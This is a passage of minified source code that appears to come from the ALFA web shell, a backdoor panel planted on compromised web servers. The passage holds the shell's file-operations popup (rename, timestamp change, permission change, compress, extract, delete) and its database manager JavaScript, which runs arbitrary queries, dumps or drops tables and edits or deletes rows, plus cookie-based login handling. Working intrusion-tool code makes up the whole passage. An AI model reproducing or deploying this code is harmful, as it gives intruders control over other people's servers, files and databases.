src=\"http://solevisible.com/icons/menu/rename.svg\">  Rename</a>\r\n  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"modify\");' ftype='' path='' fname='' name='modify'><img src=\"http://solevisible.com/icons/menu/time.svg\">  Modify</a>\r\n  <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"permission\");' name='permission'><img src=\"http://solevisible.com/icons/menu/key.svg\"> Change Permissions</a>\r\n  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='compress'><img src=\"http://solevisible.com/icons/menu/resize.svg\"> Compress</a>\r\n  <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='extract'><img src=\"http://solevisible.com/icons/menu/increase.svg\"> Extract</a>\r\n  <a href='javascript:void(0);' name='delete'><img src=\"http://solevisible.com/icons/menu/delete.svg\"> Delete</a>\r\n</div>\r\n<div id=\"filesman-tab-full-path\"></div>\r\n<div id='alert-area' class='alert-area'></div>\r\n<div class='cl-popup-fixed' style='display:none;'>\r\n\t<div id='shortcutMenu-holder'>\r\n\t\t<div class='popup-head'></div>\r\n\t\t\t<form autocomplete='off' onSubmit='return false;'>\r\n\t\t\t\t<label class='old-path-lbl'></label>\r\n\t\t\t\t<div style='overflow: hidden;white-space: nowrap;text-overflow: ellipsis;' class='old-path-content'></div>\r\n\t\t\t\t<label style='margin-top:10px;' class='new-filename-lbl'>New file name</label>\r\n\t\t\t\t<input type='text' name='fname'>\r\n\t\t\t\t<div class='perm-table-holder'>\r\n\t\t\t\t\t<table>\r\n\t\t\t\t\t   <tbody>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td><b>Mode</b></td>\r\n\t\t\t\t\t         <td>User</td>\r\n\t\t\t\t\t         <td>Group</td>\r\n\t\t\t\t\t         <td>World</td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Read</td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='ur' value='4' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='gr' value='4' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='wr' value='4' onclick='calcperm();'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Write</td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='uw' value='2' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='gw' value='2' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='ww' value='2' onclick='calcperm();'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Execute</td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='ux' value='1' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='gx' value='1' onclick='calcperm();'></td>\r\n\t\t\t\t\t         <td><input type='checkbox' name='wx' value='1' onclick='calcperm();'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t      <tr>\r\n\t\t\t\t\t         <td>Permission</td>\r\n\t\t\t\t\t         <td><input style='width:60px;' type='text' name='u' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"u\", [\"u\"]);'></td>\r\n\t\t\t\t\t         <td><input style='width:60px;' type='text' name='g' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"g\", [\"g\"]);'></td>\r\n\t\t\t\t\t         <td><input style='width:60px;' type='text' name='w' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"w\", [\"w\"]);'></td>\r\n\t\t\t\t\t      </tr>\r\n\t\t\t\t\t   </tbody>\r\n\t\t\t\t\t</table>\r\n\t\t\t\t</div>\r\n\r\n\t\t\t</form>\r\n\t\t<div class='popup-foot'>\r\n\t\t\t<button style='background: #2b5225;' name='accept' action='' onclick='alfaPopUpDoAction(this);'></button>\r\n\t\t\t<button style='background: #9e2c2c;' onclick='d.querySelector(\".cl-popup-fixed\").style.display=\"none\";'>Cancell</button>\r\n\t\t</div>\r\n\t</div>\r\n</div>";
            ?>
<script>
function alfaMysqlApi(e,t){var a={host:mysql_cache[e.db_id].host,user:mysql_cache[e.db_id].user,pass:mysql_cache[e.db_id].pass,db:e.db_target,db_id:e.db_id};if(e.hasOwnProperty("db_info"))for(var i in e.db_info)a[i]=e.db_info[i];var l={a:alfab64("Sql_manager_api"),c_:alfab64(c_),alfa1:alfab64(JSON.stringify(a))};if(e.hasOwnProperty("post"))for(var i in e.post.hasOwnProperty("alfa2")&&"load_data"!=e.post.alfa2&&"page"!=e.post.alfa2&&"edit"!=e.post.alfa2&&"delete"!=e.post.alfa2&&(d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-pager").innerHTML="",d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-reporter").innerHTML=""),e.post)l[i]=alfab64(e.post[i]);var r="";for(var o in l)r+=o+"="+l[o]+"&";alfaloader(e.db_id,"block"),_Ajax(d.URL,r,function(a){alfaloader(e.db_id,"none"),t(a)},!0,e.db_id)}function alfaMysqlFilterTable(e,t){setTimeout(function(){var a="",i="",l=(a="","");if(null!=e)a=e.getAttribute("target"),i=e.getAttribute("db_id"),l=e.value;else a=t.target,i=t.db_id,l=t.value;l=new RegExp(l,"i"),d.querySelectorAll("#"+i+" "+a+" ul > li").forEach(function(e){var t=e.querySelector(".mysql_tables");if(null==t)return!1;-1==(t=t.innerText).search(l)?e.style.display="none":e.style.display="block"})},200)}function alfaMysqlFilterAllTable(e,t){var a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" .mysql-tables input[name=filter_all]").value,l=d.querySelector("#"+a+" input[name=sql_count]").checked,r=[],o=[];if(d.querySelectorAll("#"+a+" .mysql-tables .list_container").forEach(function(e){var t=e.getAttribute("mode"),a=e.getAttribute("db_name");"no"==t&&r.push(a),o.push(a)}),r.length>0){if(0==i.length&&void 0===t)return!1;alfaMysqlApi({db_id:a,db_target:r[0],ajax_id:"mysql_get_all_tables",db_info:{databases:r},post:{alfa2:"load_all_tables",alfa3:l}},function(r){if(0!=r.length){for(var o in r=JSON.parse(r)){var n=o,s=d.querySelector("#"+a+" .cls-"+n);alfaMysqlMakeTblList(r[o],s,a,n,l)}void 0===t?alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}):(e.setAttribute("mode","opened"),d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/b_minus.png")}})}else if(void 0===t)for(var n in alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}),o)alfaMysqlTableMode(a,o[n],"closed");else{var s="",c=e.getAttribute("mode");for(var n in"opened"==c?(e.setAttribute("mode","closed"),s="b_plus.png"):(e.setAttribute("mode","opened"),s="b_minus.png"),o)alfaMysqlTableMode(a,o[n],c);d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/"+s}}function alfaMysqlTableMode(e,t,a){var i=d.querySelector("#"+e+" .cls-"+t),l="";void 0===a?(l=-1!=i.classList.value.indexOf("hide-db-tables")?"b_minus.png":"b_plus.png",i.classList.toggle("hide-db-tables")):"opened"==a?(l="b_plus.png",i.classList.add("hide-db-tables")):(l="b_minus.png",i.classList.remove("hide-db-tables")),d.querySelector("#"+e+" .cls-"+t+"-expander img").src="http://solevisible.com/icons/menu/"+l}function alfaMysqlExpander(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=e.getAttribute("sql_count"),l=d.querySelector("#"+a+" .cls-"+t);"loaded"==l.getAttribute("mode")?alfaMysqlTableMode(a,t):alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_get_tables",post:{alfa2:"load_tables",alfa3:i}},function(e){0!=e.length&&alfaMysqlMakeTblList(e=JSON.parse(e),l,a,t,i)})}function alfaMysqlTablesEvil(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i=e.getAttribute("mode");"checked"==i?(i=!1,e.setAttribute("mode","not")):(i=!0,e.setAttribute("mode","checked")),d.querySelectorAll("#"+a+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked=i})}function alfaMysqlTablesDumpDrop(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i="none";"dump"==e.value&&(i="block"),d.querySelector("#"+a+" "+t+" .dump-file-holder").style.display=i}function alfaMysqlTablesDumpDropBtn(e){var t=e.getAttribute("target"),a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=[],r=d.querySelector("#"+i+" input[name=sql_count]").checked,o=d.querySelector("#"+i+" "+t),n=o.querySelector("select[name=tables_evil]").value,s=o.querySelector(".dump-file-holder input").value;d.querySelectorAll("#"+i+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked&&l.push(e.value)}),l.length>0&&alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_query_evil",db_info:{tables:l,mode:n,dump_file:s},post:{alfa2:"dump_drop"}},function(e){0!=e.length&&(e=JSON.parse(e),"drop"==n?alfaMysqlMakeTblList(e,o,i,a,r):o.querySelector(".dump-file-holder").insertAdjacentHTML("beforeend","<div><a href='javascript:void(0);' onclick='g(\"FilesTools\",null,\""+s+'","download");\'><span>Download: '+s+"</span></a></div>"))})}function alfaMysqlMakeTblList(e,t,a,i,l){t.setAttribute("mode","loaded");var r='<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" db_id="'+a+'" placeholder="Filter Table" target=".cls-'+i+'" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';for(var o in e)null!=e[o]&&(r+="<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='"+e[o].name+"'>&nbsp;<a class='db-opt-id' db_target='"+i+"' db_id='"+a+"' href='javascript:void(0);' onclick=\"alfaLoadTableData(this, '"+e[o].name+"')\"><span class='mysql_tables' style='font-weight:unset;'>"+e[o].name+"</span></a>"+(l?" <small><span style='font-weight:unset;' class='mysql_table_count'>("+e[o].count+")</span></small>":"&nbsp;")+"</div></li>");r+='</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" db_id="'+a+'" class="db-opt-id" target=".cls-'+i+'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" db_id="'+a+'" target=".cls-'+i+'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" db_id="'+a+'" class="db-opt-id" db_target="'+i+'" target=".cls-'+i+'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>',t.innerHTML=r,d.querySelector("#"+a+" .cls-"+i+"-expander img").src="http://solevisible.com/icons/menu/b_minus.png"}function alfaMysqlQuery(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" textarea[name=query]").value;alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_load_query_data",db_info:{query:i},post:{alfa2:"query"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0))})}function alfaMysqlReportBuilder(e,t){var a="";t.status||(a="<div><span>Error: </span><div style='padding-left: 50px;'><pre>"+t.error+"</pre></div></div>");var i="<div><span>Query:</span><div style='padding-left: 50px;'><pre>"+t.query+"</pre></div>"+a+"</div>";d.querySelector("#"+e+" .mysql-query-reporter").innerHTML=i}function alfaMysqlTablePanelCtl(e){var t=e.getAttribute("db_id"),a=(t=e.getAttribute("db_id"),d.querySelector("#"+t)),i=a.querySelector(".tables-panel-ctl");"none"==i.getAttribute("mode")?(a.querySelector(".mysql-tables").style.display="block",i.setAttribute("mode","block"),i.innerHTML="&#x3C;&#x3C;",a.querySelector(".mysql-query-results-fixed").classList.remove("mysql-query-results-fixed")):(a.querySelector(".mysql-tables").style.display="none",i.setAttribute("mode","none"),i.innerHTML="&#x3E;&#x3E;",a.querySelector(".mysql-query-results").classList.add("mysql-query-results-fixed")),i.classList.toggle("tables-panel-ctl-min")}function alfaMysqlTabCtl(e,t){var a=void 0===t?e.getAttribute("db_id"):e.db_id,i=void 0===t?e.getAttribute("target"):e.target;d.querySelectorAll("#"+a+" .mysql-query-content").forEach(function(e){e.classList.add("mysql-hide-content")}),d.querySelector("#"+a+" .mysql-query-result-tabs .mysql-query-selected-tab").classList.remove("mysql-query-selected-tab"),void 0===t?e.classList.add("mysql-query-selected-tab"):d.querySelector("#"+a+" .mysql-query-result-tabs div:nth-child("+e.child+")").classList.add("mysql-query-selected-tab"),d.querySelector("#"+a+" "+i).classList.remove("mysql-hide-content")}function alfaLoadTableData(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_load_table_data",db_info:{table:t},post:{alfa2:"load_data"}},function(e){if(0!=e.length){e=JSON.parse(e);var l="",r="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>",o="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th><th>Change</th></tr>",n="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Collation</th><th>Operator</th><th>Value</th></tr>",s=["int","smallint","bigint","tinyint","mediumint"],c=["longtext","text","mediumtext","tinytext"];for(var u in e.columns){var p="text";-1!=s.indexOf(e.columns[u].data_type)&&(p="number"),n+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+e.columns[u].collation+"</td><td><select name='"+e.columns[u].name+"'><option value='='>=</option><option value='!='>!=</option><option value='>'>&gt;</option><option value='>='>&gt;=</option><option value='<'>&lt;</option><option value='<='>&lt;=</option><option value=\"= ''\">= ''</option><option value=\"!= ''\">!= ''</option><option value='LIKE'>LIKE</option><option value='LIKE %...%'>LIKE %...%</option><option value='NOT LIKE'>NOT LIKE</option><option value='REGEXP'>REGEXP</option><option value='REGEXP ^...$'>REGEXP ^...$</option><option value='NOT REGEXP'>NOT REGEXP</option><option value='IN (...)'>IN (...)</option><option value='NOT IN (...)'>NOT IN (...)</option><option value='BETWEEN'>BETWEEN</option><option value='NOT BETWEEN'>NOT BETWEEN</option><option value='IS NULL'>IS NULL</option><option value='IS NOT NULL'>IS NOT NULL</option></select></td><td><input type='"+p+"' name='"+e.columns[u].name+"'></td></tr>";var f=alfaMysqlLoadDataType(e.columns[u].data_type);null==e.columns[u].type_value&&(e.columns[u].type_value=""),o+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td><select name='sel_"+e.columns[u].name+"'>"+f+"</select></td><td><input name='value_"+e.columns[u].name+"' type='text' value='"+(-1==c.indexOf(e.columns[u].data_type)?e.columns[u].type_value:"")+"'></td><td><button col_name='"+e.columns[u].name+"' tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlAlterTbl(this);return false;'>Change</button></td></tr>";var m="";switch(e.columns[u].data_type){case"longtext":case"text":m="<textarea name='"+e.columns[u].name+"' rows='5'></textarea>";break;case"int":case"smallint":case"bigint":m="<input type='number' name='"+e.columns[u].name+"' value=''>";break;default:m="<input type='text' name='"+e.columns[u].name+"' value=''>"}r+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+m+"</td></tr>"}if(r+="</table><div style='margin-left:20px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"insert\");return false;'>Insert</button></div><div class='mysql-insert-result'></div>",o+="</table><div class='mysql-structure-qres'></div>",n+="</table><div style='padding-left: 384px;margin-top: 15px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlSearch(this);return false;'>Search</button></div>",e.pages>0){l+="<span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,1);'><<</span> <span> page: </span> <select tbl_name='"+t+"' db_target='"+a+"' name='mysql-q-pages' db_id='"+i+"' class='db-opt-id' onchange='alfaMysqlChangePage(this);' pages='"+e.pages+"'>";for(var b=1;b<e.pages+1;b++)l+="<option>"+b+"</option>";l+="</select><span> Of "+e.pages+"</span> <span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,2);'>>></span>"}var y=d.querySelector("#"+i);y.querySelector(".mysql-search-area").innerHTML=n,y.querySelector(".mysql-insert-row").innerHTML=r,y.querySelector(".mysql-edit-row").innerHTML="",y.querySelector(".mysql-structure").innerHTML=o,y.querySelector(".mysql-query-result-header .mysql-query-pager").innerHTML=l,y.querySelector(".mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:i,target:".mysql-query-result-content"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="none",alfaMysqlReportBuilder(i,e)}})}function alfaMysqlAlterTbl(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r=e.getAttribute("col_name"),o={};o.type=i.querySelector(".mysql-structure select[name=sel_"+r+"]").value,o.input=i.querySelector(".mysql-structure input[name=value_"+r+"]").value,alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_alter",db_info:{table:l,column:r,alter:o},post:{alfa2:"alter"}},function(e){var t=d.querySelector("#"+a+" .mysql-structure-qres");t.innerHTML=e,t.style.display="block"})}function alfaMysqlSearch(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r={};i.querySelectorAll(".mysql-search-area input, .mysql-search-area select").forEach(function(e){r.hasOwnProperty(e.name)||(r[e.name]={}),"SELECT"==e.tagName?r[e.name].opt=e.value:r[e.name].value=e.value}),alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_search_query",db_info:{table:l,search:r},post:{alfa2:"search"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaMysqlEditRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=(d.querySelector("#"+i),e.getAttribute("col_key")),r=e.getAttribute("key"),o=e.getAttribute("tbl_name"),n=e.getAttribute("row_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_table_edit_query",db_info:{table:o,col_key:l,key:r},post:{alfa2:t}},function(e){if(0!=e.length)if(e=JSON.parse(e),"edit"==t){var s="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>";for(var c in e){var u="";switch(e[c].type.tag){case"textarea":u="<textarea name='"+e[c].col+"' rows='5'>"+e[c].value+"</textarea>";break;case"input":u="<input type='"+e[c].type.type+"' name='"+e[c].col+"' value='"+e[c].value+"'>"}s+="<tr><th style='text-align: left;'>"+e[c].col+"</th><td>"+e[c].type.col_type+"</td><td>"+u+"</td></tr>"}s+="</table><div style='margin-left:20px;'><button col_key='"+l+"' key='"+r+"' tbl_name='"+o+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"edit\");return false;'>Update</button></div><div class='mysql-update-result'></div>",d.querySelector("#"+i+" .mysql-edit-row").innerHTML=s,alfaMysqlTabCtl({child:6,db_id:i,target:".mysql-edit-row"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="inline-block"}else"delete"==t&&(e.status?d.querySelector("#"+i+" .tbl_row_l"+n).remove():alert(e.error))})}function alfaMysqlTblSelectAll(e){var t=e.getAttribute("db_id");d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(t){t.checked=e.checked})}function alfaMysqlDeleteAllSelectedrows(e){var t=e.getAttribute("db_id"),a=e.getAttribute("db_target"),i=e.getAttribute("col_key"),l=e.getAttribute("tbl_name"),r=[];if(d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&r.push(e.value)}),0==r.length)return!1;alfaMysqlApi({db_id:t,db_target:a,ajax_id:"mysql_table_delete_all_query",db_info:{table:l,col_key:i,rows:r},post:{alfa2:"delete_all"}},function(e){if(""!=e)if((e=JSON.parse(e)).status){var a=0,i=d.querySelector("#"+t);d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&(a=e.getAttribute("row_id"),i.querySelector(".tbl_row_l"+a).remove())})}else alert(e.error)})}function alfaMysqlUpdateRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=d.querySelector("#"+i),r=".mysql-insert-row",o=".mysql-insert-result",n="mysql_table_insert_query",s="insert",c={table:e.getAttribute("tbl_name")};if("edit"==t){var u=e.getAttribute("col_key"),p=e.getAttribute("key");r=".mysql-edit-row",o=".mysql-update-result",n="mysql_table_update_query",s="update",c.col_key=u,c.key=p}var f={};l.querySelectorAll(r+" input, "+r+" textarea").forEach(function(e){f.hasOwnProperty(e.name)||(f[e.name]={}),f[e.name]=e.value}),c.data=f,alfaMysqlApi({db_id:i,db_target:a,ajax_id:n,db_info:c,post:{alfa2:s}},function(e){if(0!=e.length){e=JSON.parse(e);var t=d.querySelector("#"+i+" "+o);t.style.display="block",e.status?t.innerHTML="Success...":t.innerHTML=e.error}})}function alfaMysqlLoadDataType(e){e=e.toUpperCase();var t=["INT","VARCHAR","TEXT","DATE",{key:"Numeric",vals:["TINYINT","SMALLINT","MEDIUMINT","INT","BIGINT","-","DECIMAL","FLOAT","DOUBLE","REAL","-","BIT","BOOLEAN","SERIAL"]},{key:"Date and time",vals:["DATE","DATETIME","TIMESTAMP","TIME","YEAR"]},{key:"String",vals:["CHAR","VARCHAR","-","TINYTEXT","TEXT","MEDIUMTEXT","LONGTEXT","-","BINARY","VARBINARY","-","TINYBLOB","MEDIUMBLOB","BLOB","LONGBLOB","-","ENUM","SET"]},{key:"Spatial",vals:["GEOMETRY","POINT","LINESTRING","POLYGON","MULTIPOINT","MULTILINESTRING","MULTIPOLYGON","GEOMETRYCOLLECTION"]},{key:"JSON",vals:["JSON"]}],a="",i=!1;for(var l in t)if("object"==typeof t[l]){for(var r in a+='<optgroup label="'+t[l].key+'">',t[l].vals)a+="<option"+(t[l].vals[r]!=e||i?"":" selected")+">"+t[l].vals[r]+"</option>",t[l].vals[r]==e&&(i=!0);a+="</optgroup>"}else a+="<option"+(t[l]!=e||i?"":" selected")+">"+t[l]+"</option>",t[l]==e&&(i=!0);return a}function alfaMysqlChangePage(e,t){var a=e.getAttribute("db_id"),i=0;if(void 0!==t){e=d.querySelector("#"+a+" select[name=mysql-q-pages]");var l=parseInt(e.getAttribute("pages"));if(i=parseInt(e.value),1==t?--i:++i,0==i||l<i)return!1;e.value=i}else i=e.value;var r=e.getAttribute("db_target"),o=e.getAttribute("tbl_name");alfaMysqlApi({db_id:a,db_target:r,ajax_id:"mysql_table_change_page",db_info:{table:o,page:i},post:{alfa2:"page"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaRemoveCookie(e){document.cookie=e+"=;Max-Age=0; path=/;"}function alfaLogOut(){alfaRemoveCookie("AlfaUser"),alfaRemoveCookie("AlfaPass"),location.reload()}var alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(a){if(""===a||null==a)throw'"msg parameter is empty"';var i=document.querySelector(e),l=document.createElement("DIV"),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("A"),s=document.createElement("div"),c=document.createElement("IMG"),d=this;if(s.style.display="inline-block",s.style.marginRight="10px",r.style.display="inline-block",o.classList.add("alert-content"),o.innerText=a,n.classList.add("alert-close"),n.setAttribute("href","#"),l.classList.add("alert-box"),c.src=this.types[t.type].icon,c.style.width="30px",s.appendChild(c),l.appendChild(s),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,r.appendChild(u)}if(r.appendChild(o),l.appendChild(r),t.hideCloseButton&&void 0!==t.hideCloseButton||l.appendChild(n),t.hasOwnProperty("type")&&l.classList.add(this.types[t.type].class),i.appendChild(l),n.addEventListener("click",function(e){e.preventDefault(),d.hide(l)}),!t.persistent)var p=setTimeout(function(){d.hide(l),clearTimeout(p)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,a,i,l){void 0===a&&(a="success"),void 0===i&&(i=!1),void 0===l&&(l=1e4);var r={closeTime:l,persistent:i,type:a,hideCloseButton:!1};void 0!==t&&(r.title=t),new alfaAlertBox("#alert-area",r).show(e)}function alfaSyncMenuToOpt(e,t){var a="",i="",l=null;void 0!==t?(a="view_archive",i=e,l=location):(a=e.name,i=e.getAttribute("fname"),l=e),"extract"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==a&&(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+i,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){var t="#filesman_holder_"+alfa_current_fm_id;setTimeout(function(){var a=new RegExp(e.value,"i");d.querySelectorAll(t+" .fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(a)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,a){if(console.log(t),$("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var i="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="sql-content sql-active-content">'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",'<div id="tab_'+i+'" opt_id="'+i+'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="'+i+'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\'sql\',null,\'\',\'\',\'\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>'),$(i).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",i)});try{$(i).querySelector(".getconfig").setAttribute("base_id",i)}catch(e){}return i}$(t).innerHTML=e;var l=$("tab_"+t);null!=l&&((-1==l.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+l.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=a&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){console.log(e),alfa_before_do_action_id="",$("options_window").style.display="block";var a=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var i="",l=$("menu_opt_"+e).innerHTML;"market"==e?l="Alfa Market":"GetDisFunc"==e&&(l="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=a){var r=a.getAttribute("opt_count");null!=r?(i=parseInt(r)+1,a.setAttribute("opt_count",i)):(i=1,a.setAttribute("opt_count",i))}var o="option_"+e+i;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",'<div id="'+o+'" class="options_holder">'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",'<div opt_id="'+o+'" onclick="optionsTabController(this);" title="'+l+'" id="tab_'+o+'" class="tab_name tab_is_active">'+l+' <img opt_id="'+o+'" 